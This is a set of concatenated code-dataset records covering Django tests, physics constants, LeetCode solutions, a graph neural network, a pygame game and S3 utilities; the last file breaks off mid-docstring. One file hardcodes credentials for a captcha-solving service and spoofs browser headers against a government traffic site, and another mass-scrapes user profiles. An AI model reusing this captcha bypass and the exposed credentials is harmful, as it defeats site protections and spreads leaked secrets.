get_post_by_query_text(query_text)\n assert all(post.nameOfLocation in expected_output for post in posts)\n\n # assert all(course.location in expected_output for course in courses)\n\n @pytest.mark.django_db\n def test_verify_respone_GET(self, client):\n response = client.get(reverse('post_list_Search'), {'query_text': 'Galilee'})\n posts_not_found = [b'Eilat', b'Dead Sea', b'`En Yorqe`am']\n assert response.status_code == 200\n assert b'Galilee' in response.content\n assert all(post not in response.content for post in posts_not_found)\n","sub_path":"Post/tests/test_views_posts.py","file_name":"test_views_posts.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"427536608","text":"#!/usr/bin/env python\n\n# Copyright (c) 2017, DIANA-HEP\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# * Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"ROOT constants used in deserialization.\"\"\"\n\nimport numpy\n\n# used in unmarshaling\nkByteCountMask = numpy.int64(0x40000000)\nkByteCountVMask = numpy.int64(0x4000)\nkClassMask = numpy.int64(0x80000000)\nkNewClassTag = numpy.int64(0xFFFFFFFF)\n\nkIsOnHeap = numpy.uint32(0x01000000)\nkIsReferenced = numpy.uint32(1 << 4)\n\nkMapOffset = 2\n\n# not used?\nkNullTag = 0\nkNotDeleted = numpy.uint32(0x02000000)\nkZombie = numpy.uint32(0x04000000)\nkBitMask = numpy.uint32(0x00FFFFFF)\nkDisplacementMask = numpy.uint32(0xFF000000)\n\n################################################################ core/zip/inc/Compression.h\n\nkZLIB = 1\nkLZMA = 2\nkOldCompressionAlgo = 3\nkLZ4 = 4\nkUndefinedCompressionAlgorithm = 5\n\n################################################################ constants for streamers\n\nkBase = 0\nkChar = 1\nkShort = 2\nkInt = 3\nkLong = 4\nkFloat = 5\nkCounter = 6\nkCharStar = 7\nkDouble = 8\nkDouble32 = 9\nkLegacyChar = 10\nkUChar = 11\nkUShort = 12\nkUInt = 13\nkULong = 14\nkBits = 15\nkLong64 = 16\nkULong64 = 17\nkBool = 18\nkFloat16 = 19\nkOffsetL = 20\nkOffsetP = 40\nkObject = 61\nkAny = 62\nkObjectp = 63\nkObjectP = 64\nkTString = 65\nkTObject = 66\nkTNamed = 67\nkAnyp = 68\nkAnyP = 69\nkAnyPnoVT = 70\nkSTLp = 71\n\nkSkip = 100\nkSkipL = 120\nkSkipP = 140\n\nkConv = 200\nkConvL = 220\nkConvP = 240\n\nkSTL = 300\nkSTLstring = 365\n\nkStreamer = 500\nkStreamLoop = 501\n\n################################################################ constants from core/foundation/inc/ESTLType.h\n\nkNotSTL = 0\nkSTLvector = 1\nkSTLlist = 2\nkSTLdeque = 3\nkSTLmap = 4\nkSTLmultimap = 5\nkSTLset = 6\nkSTLmultiset = 7\nkSTLbitset = 8\nkSTLforwardlist = 9\nkSTLunorderedset = 10\nkSTLunorderedmultiset = 11\nkSTLunorderedmap = 12\nkSTLunorderedmultimap = 13\nkSTLend = 14\nkSTLany = 300\n\n################################################################ IOFeatures\n\nkGenerateOffsetMap = 1\n","sub_path":"sparse/repos/chnzhangrui/SgTopWorkshop/binder/uproot/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":4318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"520969448","text":"from api.chaojiying import Chaojiying_Client\nfrom monitor.models import SpiderInfo, CheckInfo\nHEADER = {\n 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'Referer': 'https://hn.122.gov.cn/views/inquiry.html',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36',\n}\ndef chaojicheck(path,predict,tag_len):\n chaojiying = Chaojiying_Client('mukever', 'abc123456', '96001')\n im = open(path, 'rb').read()\n res = chaojiying.PostPic(im, '100'+tag_len)\n print(res)\n right = 0\n if res['err_no'] ==0:\n if str.upper(res['pic_str'])==predict:\n right = 1\n else:\n chaojiying.ReportError(res['pic_id'])\n return right\n\n","sub_path":"apps/api/postutils.py","file_name":"postutils.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"134098561","text":"from core.advbase import *\n\ndef module():\n return Ramona\n\nclass Ramona(Adv):\n conf = {}\n conf['slots.a'] = ['Summer_Paladyns', 'Primal_Crisis']\n conf['acl'] = \"\"\"\n `dragon(c3-s-s-end),s=1 and not s4.check()\n `s3, not buff(s3)\n `s2, s1.check()\n `s4, s=1\n `s1(all)\n \"\"\"\n conf['coabs'] = ['Gala_Sarisse', 'Wand', 'Marth']\n conf['share'] = ['Summer_Patia']\n\n\n def s(self, n, s1_kind=None):\n if n == 1 and s1_kind == 'all':\n self.current_s['s1'] = s1_kind\n else:\n self.current_s['s1'] = 'default'\n return super().s(n)\n\n\nif __name__ == '__main__':\n from core.simulate import test_with_argv\n test_with_argv(None, *sys.argv)\n","sub_path":"adv/ramona.py","file_name":"ramona.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"638888166","text":"class Solution(object):\n def findRestaurant(self, list1, list2):\n \"\"\"\n :type list1: List[str]\n :type list2: List[str]\n :rtype: List[str]\n \"\"\"\n ans = list()\n minIndex = 0xFFFFFFFF\n for i, item in enumerate(list1):\n if item in list2:\n indexSum = i + list2.index(item)\n if indexSum <= minIndex:\n ans.append(item)\n minIndex = indexSum\n\n return ans\n","sub_path":"src/599.py","file_name":"599.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"434586506","text":"import ECC\nimport hashlib\nimport time\nfrom random import SystemRandom \nrand=SystemRandom()\ncurve=ECC.secp256k1\ndelta = 1000000\ndef fxy(x,y):\n\tA=[[0,0,0],[0,0,0],[0,0,0]]\n\tfp=open('multivariate.txt','r')\n\tl=fp.readlines()\n\t# print(l)\n\tfp.close()\n\tcount = 0\n\tfor i in range (0,3):\n\t\tfor j in range(i,3):\n\t\t\tA[i][j]=int(l[count].split('\\n')[0])\n\t\t\tcount=count+1\n\tfor i in range (1,3):\n\t\tfor j in range (0,i):\n\t\t\tA[i][j] = A[j][i]\n\tX=[]\n\tfor i in range (0,3):\n\t\tX.append((x**i)%curve.p)\n\t# print(X)\n\n\tY=[]\n\tfor i in range (0,3):\n\t\tY.append((y**i%curve.p))\n\t# print(Y)\n\t\n\tres1=[0,0,0]\n\tfor i in range( len(X)):\n\t\tfor j in range (len(A[i])):\n\t\t\tfor k in range (len(A)):\n\t\t\t\tres1[i] = ((res1[i]%curve.p)+(A[i][k]*X[k])%curve.p)%curve.p\n\t# print(res1)\n\tmultivariate = 0\n\tfor i in range (len(res1)):\n\t\tmultivariate=(multivariate%curve.p + (res1[i]*Y[i])%curve.p ) %curve.p\n\n\t# print(multivariate)\n\treturn multivariate\n\n","sub_path":"GSS/multi.py","file_name":"multi.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"209878783","text":"#! /usr/bin/python3\r\n\r\nimport io\r\nimport os\r\nimport sys\r\nimport pickle\r\nimport requests\r\nfrom scrapers.debate_list import *\r\nfrom scrapers.debate_args import *\r\nfrom scrapers.user_params import *\r\nimport threading\r\nimport asyncio\r\nfrom concurrent.futures import ThreadPoolExecutor\r\n\r\ndest_directory = \"UserProfile_Responses\"\r\nurl = \"http://www.createdebate.com/user/viewprofile/\"\r\n\r\nuser2uuid = pickle.load(open(\"dict_user2uuid\", 'rb'))\r\n\r\ndef fetch_response(user_name):\r\n profile_url = url + user_name\r\n uuid = user2uuid[user_name]\r\n if (not os.path.exists(\"{}/User{}\".format(dest_directory, uuid))):\r\n r = requests.get(profile_url)\r\n print(uuid)\r\n # print(r.text)\r\n with io.open(\"{}/User{}\".format(dest_directory, uuid), 'wb') as f:\r\n pickle.dump(r, f)\r\n\r\n\r\nasync def get_data_asynchronous():\r\n\r\n with ThreadPoolExecutor(max_workers=200) as executor:\r\n loop = asyncio.get_event_loop()\r\n tasks = [\r\n loop.run_in_executor(\r\n executor,\r\n fetch_response,\r\n username\r\n )\r\n for username in user2uuid.keys()\r\n ]\r\n for response in await asyncio.gather(*tasks):\r\n pass\r\n\r\nif __name__ == \"__main__\":\r\n if (not os.path.exists(dest_directory)):\r\n os.mkdir(dest_directory)\r\n loop = asyncio.get_event_loop()\r\n future = asyncio.ensure_future(get_data_asynchronous())\r\n loop.run_until_complete(future)\r\n\r\n","sub_path":"get_all_user_profiles.py","file_name":"get_all_user_profiles.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"364751270","text":"from enum import Enum\n\nfrom .schema import EnumFromName, Identifier, Path, List, Dict\nfrom .loader import Loadable\nfrom .display import Displayable\nfrom .tags import Taggable\nfrom .combat import DamageType, Attack\nfrom .player import Attribute\nfrom .item import WieldSlot\n\nclass Target(Enum):\n SELF = 1\n FRIEND = 2\n ENEMY = 3\n\nclass Ability(Loadable):\n\n SCHEMA = {\n 'spirit_cost': (float, 0.0),\n 'target': (EnumFromName(Target), None),\n 'num_targets': (int, 1),\n 'speed': (float, 3.0),\n 'cooldown': (float, None),\n 'attack': (Attack, None),\n 'resistance': (Dict(EnumFromName(DamageType), float), {}),\n 'modifiers': (Dict(EnumFromName(Attribute), float), {}),\n 'duration': (float, None),\n }\n\nclass Skill(Displayable):\n\n SCHEMA = {\n 'damage': (Dict(EnumFromName(DamageType), float), {}),\n 'resistance': (Dict(EnumFromName(DamageType), float), {}),\n 'modifiers': (Dict(EnumFromName(Attribute), float), {}),\n 'proficiencies': (Dict(Identifier, int), {}),\n 'ability': (Ability, None),\n }\n\nclass Guild(Displayable, Taggable):\n\n SCHEMA = {\n 'karma_cost': (int, 0),\n 'required_guilds': (Dict(Path, int), {}),\n 'exclusive_guilds': (List(Path), []),\n 'title': (str, 'a member'),\n 'skills': (Dict(int, List(Path)), {}),\n }\n","sub_path":"amber/guild.py","file_name":"guild.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"227957589","text":"\"\"\"\nhttps://leetcode.com/problems/meeting-rooms-ii/\nMeeting Rooms II\nGiven an array of meeting time intervals intervals where intervals[i] = [starti, endi], return the minimum number of conference rooms required.\nExample 1:\nInput: intervals = [[0,30],[5,10],[15,20]]\nOutput: 2\nExample 2:\nInput: intervals = [[7,10],[2,4]]\nOutput: 1\n\"\"\"\n\"\"\"\nclass Solution:\n def minMeetingRooms(self, intervals: List[List[int]]) -> int:\n \n # The heap initialization\n free_rooms = []\n\n # Sort the meetings in increasing order of their start time.\n intervals.sort(key= lambda x: x[0])\n\n # Add the first meeting. We have to give a new room to the first meeting.\n heapq.heappush(free_rooms, intervals[0][1])\n\n # For all the remaining meeting rooms\n for i in intervals[1:]:\n\n # If the room due to free up the earliest is free, assign that room to this meeting.\n if free_rooms[0] <= i[0]:\n heapq.heappop(free_rooms)\n\n # If a new room is to be assigned, then also we add to the heap,\n # If an old room is allocated, then also we have to add to the heap with updated end time.\n heapq.heappush(free_rooms, i[1])\n\n # The size of the heap tells us the minimum rooms required for all the meetings.\n return len(free_rooms)\n\"\"\"\n\n\nclass Solution:\n def minMeetingRooms(self, intervals: List[List[int]]) -> int:\n intervals.sort(key=lambda x: x[0])\n free_rooms = [intervals[0][1]]\n heapq.heapify(free_rooms)\n for start, end in intervals[1:]:\n if start >= free_rooms[0]:\n heapq.heappop(free_rooms)\n heapq.heappush(free_rooms, end)\n return len(free_rooms)\n","sub_path":"leetcode-medium/Array/leetcode253MeetingRooms2.py","file_name":"leetcode253MeetingRooms2.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"182701738","text":"import torch\nimport torch.nn.functional as F\nfrom torch.nn import Sequential, Linear, ReLU\nfrom torch_geometric.nn import GINConv, global_add_pool\n\nclass GIN_MLP(torch.nn.Module):\n def __init__(self, num_features, num_classes, dim=32):\n super(Net, self).__init__()\n\n nn1 = Sequential(Linear(num_features, dim), ReLU(), Linear(dim, dim))\n self.conv1 = GINConv(nn1)\n self.bn1 = torch.nn.BatchNorm1d(dim)\n\n nn2 = Sequential(Linear(dim, dim), ReLU(), Linear(dim, dim))\n self.conv2 = GINConv(nn2)\n self.bn2 = torch.nn.BatchNorm1d(dim)\n\n nn3 = Sequential(Linear(dim, dim), ReLU(), Linear(dim, dim))\n self.conv3 = GINConv(nn3)\n self.bn3 = torch.nn.BatchNorm1d(dim)\n\n nn4 = Sequential(Linear(dim, dim), ReLU(), Linear(dim, dim))\n self.conv4 = GINConv(nn4)\n self.bn4 = torch.nn.BatchNorm1d(dim)\n\n nn5 = Sequential(Linear(dim, dim), ReLU(), Linear(dim, dim))\n self.conv5 = GINConv(nn5)\n self.bn5 = torch.nn.BatchNorm1d(dim)\n\n self.fc1 = Linear(dim, dim)\n self.fc2 = Linear(dim, num_classes)\n\n def forward(self, x, edge_index, batch):\n x = F.relu(self.conv1(x, edge_index))\n x = self.bn1(x)\n x = F.relu(self.conv2(x, edge_index))\n x = self.bn2(x)\n x = F.relu(self.conv3(x, edge_index))\n x = self.bn3(x)\n x = F.relu(self.conv4(x, edge_index))\n x = self.bn4(x)\n x = F.relu(self.conv5(x, edge_index))\n x = self.bn5(x)\n x = global_add_pool(x, batch)\n x = F.relu(self.fc1(x))\n x = F.dropout(x, p=0.5, training=self.training)\n x = self.fc2(x)\n return F.log_softmax(x, dim=-1)\n\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"52539557","text":"__author__ = 'Evan'\n\nimport tkinter as tk\n\n\ndef create_window():\n top = tk.Toplevel()\n top.title(\"About\")\n top.geometry('150x100')\n\n msg = tk.Message(top, text=\"Author - Evan Harry\")\n msg.pack()\n\n button = tk.Button(top, text=\"Close\", command=top.destroy)\n button.pack()","sub_path":"UI/about_window.py","file_name":"about_window.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"129270340","text":"from pyheal import wrapper\nfrom pyheal import ciphertext_op\nimport os, sys\nimport numpy as np\ntry:\n import boto3\n import tempfile\n import zipfile\n from concurrent import futures\n from io import BytesIO\nexcept ImportError:\n pass\nsys.path.append(os.path.dirname(sys.path[0]))\n\nROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nclass S3():\n def __init__(self, isClient=False, isLocal=False):\n self.isClient = isClient\n self.isLocal = isLocal\n if not isLocal and isClient:\n self.s3 = boto3.client('s3')\n\n def download_file(self, bucket, key, filename):\n print(\"s3: downloading a file from \" + bucket + \"/\" + key + \" as \" + filename)\n if self.isLocal:\n os.system(\"cp \" + bucket + \"/\" + key + \" \" + filename)\n else:\n if not self.isClient:\n self.s3.download_file(bucket, key, filename)\n else:\n os.system(\"aws s3 cp s3://\" + bucket + \"/\" + key + \" \" + filename)\n \n def upload_file(self, filename, bucket, key):\n print(\"s3: uploading {} as {}/{}\".format(filename,bucket,key))\n if self.isLocal:\n os.system(\"mkdir -p \" + bucket)\n os.system(\"cp \" + filename + \" \" + bucket + \"/\")\n else:\n if not self.isClient:\n self.s3.upload_file(filename, self.bucket, key)\n else:\n os.system(\"aws s3 cp \" + filename + \" s3://\" + bucket + \"/\")\n\n def download_obj_local(self, bucket, key):\n print(\"S3: downloading an object from \" + bucket + \"/\" + key)\n# with open(bucket + \"/\" + key, \"r\") as f:\n# data = f.read()\n# matrix = [item.split() for item in data.split('\\n')[:-1]]\n# if (len\n data = np.loadtxt(bucket + \"/\" + key)\n return data\n \n def upload_obj_local(self, obj, bucket, key):\n print(\"S3: uploading object as \" + bucket + \"/\" + key)\n os.system(\"mkdir -p \" + bucket)\n if isinstance(obj, ciphertext_op.CiphertextOp) or \\\n isinstance(obj, wrapper.Ciphertext) or \\\n isinstance(obj, wrapper.Plaintext):\n obj.save(bucket + \"/\" + key)\n else:\n with open(bucket + \"/\" + key, \"w\") as f:\n if isinstance(obj, list):\n for line in obj:\n np.savetxt(f, line)\n else:\n np.savetxt(f, np.array([obj]))\n# f.write(str(obj))\n# f.close()\n# os.system(\"cp /tmp/\" + key + \" \" + bucket + \"/\")\n\n # This is wrapper for download_file. \n # It returns the file content as an object\n # to be trackable by compiler\n def download_obj(self, bucket, key, filename):\n self.download_file(bucket, key, filename)\n with open(filename, 'rb') as fi:\n content = fi.read()\n return content\n\n # This is wrapper for upload_file. \n def upload_obj(self, obj, filename, bucket, key):\n self.upload_file(filename, bucket, key)\n \n # [Run on Lambda] \n def extract_each(self, bucket, path, filename, zipdata):\n upload_status = 'success'\n try:\n self.s3.upload_fileobj(\n BytesIO(zipdata.read(filename)),\n bucket,\n os.path.join(path, filename)\n )\n except Exception:\n upload_status = 'fail'\n finally:\n return filename, upload_status\n\n # [Run on Lambda] Download zip file in memory and upload to s3\n def extract_and_upload(self, bucket, zipfilename):\n temp_file = tempfile.mktemp()\n self.s3.download_file(bucket, zipfilename, temp_file)\n zipdata = zipfile.ZipFile(temp_file)\n for filename in zipdata.namelist():\n n, res = self.extract_each(bucket, '', filename, zipdata)\n\n # [Run on Client]\n def download_and_extract(self, bucket, key, filename):\n self.s3.download_file(bucket, key, filename)\n with zipfile.ZipFile(filename, 'r') as zf:\n zf.extractall(os.path.dirname(filename))\n zf.close()\n #zipfile.ZipFile(filename).extractall(os.path.dirname(filename))\n\n # [Run on Lambda]\n def compress_and_upload(self, bucket, file_list, zipfilename):\n with zipfile.ZipFile(os.path.join(\"/tmp\",zipfilename), \"w\") as zf:\n for f in file_list:\n zf.write(f, os.path.basename(f))\n zf.close()\n self.s3.upload_file(os.path.join(\"/tmp\",zipfilename), bucket, zipfilename)\n","sub_path":"utils/s3_helper.py","file_name":"s3_helper.py","file_ext":"py","file_size_in_byte":4069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"207793558","text":"import pygame.font\nfrom pygame.sprite import Group\n\nfrom ship import Ship\n\nclass Scoreboard:\n \"\"\"显示分数\"\"\"\n\n def __init__(self, ai_game):\n \"\"\"初始化信息\"\"\"\n self.ai_game = ai_game\n self.screen = ai_game.screen\n self.screen_rect = self.screen.get_rect()\n self.setting = ai_game.sts\n self.stats = ai_game.stats\n\n # 显示的字体设置\n self.text_color = (255, 255, 255)\n self.text_font = pygame.font.SysFont(None, 25)\n\n # 准备图像\n self.prep_score()\n self.prep_high_score()\n self.prep_level()\n self.prep_ships()\n\n def prep_ships(self):\n \"\"\"显示飞窜数量\"\"\"\n self.ships = Group()\n for number in range(self.stats.ships_num):\n ship = Ship(self.ai_game)\n ship.rect.x = 10 + ship.rect.width * number\n ship.rect.y = 10\n self.ships.add(ship)\n\n def prep_score(self):\n \"\"\"显示文本图像\"\"\"\n round_score = round(self.stats.score, -1)\n score_str = \"{:,}\".format(round_score)\n self.score_image = self.text_font.render(score_str, True, self.text_color)\n\n # 显示在屏幕右上角\n self.score_image_rect = self.score_image.get_rect()\n self.score_image_rect.right = self.screen_rect.right - 20\n self.score_image_rect.top = self.screen_rect.top + 20\n\n def prep_high_score(self):\n \"\"\"显示历史最高\"\"\"\n if self.stats.high_score < self.stats.score:\n self.stats.high_score = self.stats.score\n round_score = round(self.stats.high_score, -1)\n score_str = \"{:,}\".format(round_score)\n st = f\"Height Score:{score_str}\"\n self.high_score_image = self.text_font.render(st, True, self.text_color)\n\n # 显示\n self.high_score_image_rect = self.high_score_image.get_rect()\n self.high_score_image_rect.top = self.screen_rect.top\n self.high_score_image_rect.centerx = self.screen_rect.centerx\n\n def prep_level(self):\n \"\"\"显示等级\"\"\"\n level_str = f\"Level:{self.stats.ship_level}\"\n self.level_image = self.text_font.render(level_str, True, self.text_color)\n\n # 显示\n self.level_image_rect = self.level_image.get_rect()\n self.level_image_rect.top = self.screen_rect.top + 40\n self.level_image_rect.right = self.screen_rect.right - 20\n\n def show_score(self):\n \"\"\"显示分数\"\"\"\n self.screen.blit(self.score_image, self.score_image_rect)\n self.screen.blit(self.high_score_image, self.high_score_image_rect)\n self.screen.blit(self.level_image, self.level_image_rect)\n self.ships.draw(self.screen)\n\n\n\n","sub_path":"scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"496376675","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport math\n\nfrom abstest import my_abs\n\ndef move(x, y, step, angle=0):\n if (not isinstance(x, (int, float))\n or not isinstance(y, (int, float))\n or not isinstance(step, (int, float))\n or not isinstance(angle, (int, float))):\n raise TypeError('bad operand type')\n nx = x + step * math.cos(angle)\n ny = y - step * math.sin(angle)\n return nx, ny\n\ndef quadratic(a, b, c):\n for n in range(a, b, c):\n if not isinstance(n, (int, float)):\n raise TypeError('Bad operand type')\n\n if a == 0:\n raise TypeError('The quadratic coefficient cannot be 0')\n\n delta = b * b - 4 * a *c\n if delta < 0:\n return None\n else:\n x1 = (-b + math.sqrt(delta)) / (2 * a)\n x2 = (-b - math.sqrt(delta)) / (2 * a)\n return (x1, x2)\n\nn = my_abs(-20)\nprint(n)\n\n# TypeError: bad operand type\n#my_abs('123')\n\n\nx, y = move(100, 100, 60, math.pi / 6)\nprint(x, y)\n\n\n# 测试:\nprint('quadratic(2, 3, 1) =', quadratic(2, 3, 1))\nprint('quadratic(1, 3, -4) =', quadratic(1, 3, -4))\n\nif quadratic(2, 3, 1) != (-0.5, -1.0):\n print('测试失败')\nelif quadratic(1, 3, -4) != (1.0, -4.0):\n print('测试失败')\nelse:\n print('测试成功')\n","sub_path":"ik-test/python/samples/function/def_func.py","file_name":"def_func.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"556568908","text":"# Class that makes intances of various parts and information on a car. \r\n\r\nclass Car():\r\n\t\"\"\" Methods to decribe a car. \"\"\"\r\n\t\r\n\tdef __init__(self,make,model,year):\r\n\t\t\"\"\" Initialize attributes to the car for methods. \"\"\"\r\n\t\tself.make = make \r\n\t\tself.model = model \r\n\t\tself.year = year \r\n\t\tself.odometer = 0 \r\n\t\t\r\n\tdef car_description(self):\r\n\t\t\"\"\" Returns car's decriptions neatly formated. \"\"\"\r\n\t\tinfo = str(self.year) + ' ' + self.make.title() + ' ' \r\n\t\tinfo += self.model.title()\r\n\t\t\r\n\t\treturn info\r\n\t\r\n\tdef read_odometer(self):\r\n\t\t\"\"\" Prints the car's mileage. \"\"\"\r\n\t\tprint(\"Car Mileage: \" + str(self.odometer))\r\n\t\t\r\n\tdef update_odometer(self, miles):\r\n\t\t\r\n\t\tif miles >= self.odometer:\r\n\t\t\tself.odometer = miles \r\n\t\telse:\r\n\t\t\tprint(\"cant roll the odometer back\")\r\n\t\t\t\r\n\t\treturn self.odometer\t\t\r\n\r\n\tdef increment_odometer(self,travel_miles):\r\n\t\t\"\"\" Add miles to the odometer. \"\"\"\r\n\t\tself.odometer += travel_miles\r\n\t\t\r\n\r\ndream_car = Car('jeep','wrangler unlimited sport s',2018)\r\n\r\nprint(dream_car.car_description())\r\n\r\ndream_car.read_odometer() \r\n\r\ndream_car.odometer = 12000 # Manual method of chaning default attribute\r\n\r\ndream_car.read_odometer()\r\n\r\ndream_car.update_odometer(150) # Method built to change attribute\r\n\r\ndream_car.read_odometer()\r\n\r\ndream_car.increment_odometer(100000) # Additional method to change att.\r\n\r\ndream_car.read_odometer() \r\n","sub_path":"chapter_9/car_description.py","file_name":"car_description.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"312775241","text":"class Solution(object):\n def reverseWords(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n # s = s.strip().split()\n # result = []\n # for i in range(len(s)-1,-1,-1):\n # if s[i] != ' ':\n # result.append(s[i])\n # return ' '.join(result)\n\n result = []\n s = s.strip()\n i = j = len(s)-1\n while i>=0:\n while i>=0 and s[i]!=' ':\n i-=1\n result.append(s[i+1:j+1])\n while s[i]== ' ':\n i-=1\n j=i\n return ' '.join(result)\n\ns = Solution()\nprint(s.reverseWords(\"a good example\"))","sub_path":"面试题58 - I翻转单词顺序.py","file_name":"面试题58 - I翻转单词顺序.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"547691598","text":"\"\"\"empty message\n\nRevision ID: 1217a2e3ce7e\nRevises: 1402a9a4e97e\nCreate Date: 2016-03-05 11:32:09.364053\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '1217a2e3ce7e'\ndown_revision = '1402a9a4e97e'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('conference_space',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('space_name', sa.String(length=64), nullable=True),\n sa.Column('location_id', sa.Integer(), nullable=True),\n sa.Column('event_date', sa.Date(), nullable=True),\n sa.Column('start_time', sa.DateTime(), nullable=True),\n sa.Column('end_time', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('space_name')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('conference_space')\n ### end Alembic commands ###\n","sub_path":"migrations/versions/1217a2e3ce7e_.py","file_name":"1217a2e3ce7e_.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"257142961","text":"import numpy as np\nimport cv2\nimport os\nimport pseyepy\nimport math\n\n\nclass ProjectExistError(Exception):\n def __init__(self):\n super().__init__()\n self.strerror = \"Taki projekt już instnieje.\"\n\n\nclass CameraConnectionError(Exception):\n def __init__(self):\n super().__init__()\n self.strerror = \"Kamera nie została podłączona prawidłowo.\"\n\n\nclass ImageProcessor:\n def __init__(self, configuration, path=None, project_name=None):\n \"\"\"\n Funkcja inicjalizująca obiekt klasy ImageProcessor.\n :param configuration: słownik z ustawieniami sprasowany z pliku json\n :param path: ścieżka do katalogu z projektami, jeżeli nie istnieje to zdjęcia nie są zapisywane\n :param project_name: nazwa projektu oraz jednocześnie nazwa nowego folderu z projektem,\n nie mogą istnieć w danym katalogu dwa projekty o takiej samej nazwie\n \"\"\"\n try:\n self._camera = pseyepy.Camera(resolution=pseyepy.Camera.RES_LARGE, colour=False)\n except ValueError:\n raise CameraConnectionError()\n\n self.configuration = configuration\n self._path = path\n self._project_name = project_name\n self.base_photo_name = 'img'\n self.photo = None\n if self._path:\n self._prepare_folder()\n\n def get_project_path(self):\n \"\"\" Funkcja zwracająca ścieżkę do katalogu.\"\"\"\n return os.path.join(self._path, self._project_name)\n\n def _prepare_folder(self):\n \"\"\" Funkcja tworząca folder projektu. \"\"\"\n folder_path = self.get_project_path()\n if not os.path.exists(folder_path):\n os.makedirs(folder_path)\n else:\n raise ProjectExistError()\n\n def _generate_file_name(self, angle):\n \"\"\"\n Funkcja generująca nazwę pliku ze zdjęciem zgodnie z kątem obrotu.\n :param angle: kąt obrotu względem środka płytki z przedmiotem\n \"\"\"\n return self.base_photo_name + str(angle).replace('.', '_') + '.png'\n\n def take_photo(self):\n \"\"\"\n Funkcja robiąca zdjęcie oraz zapisująca jej do paramatery photo\n \"\"\"\n self.photo, __ = self._camera.read()\n\n def preprocess_photo(self):\n \"\"\"\n Funkcja wstępnie przetwarzająca zdjęcia <- wykonuje progrowanie, odcina punkty na pewno nienalezące do skanu\n :param threshold:\n :return: zwraca krotkę (laser_positions, 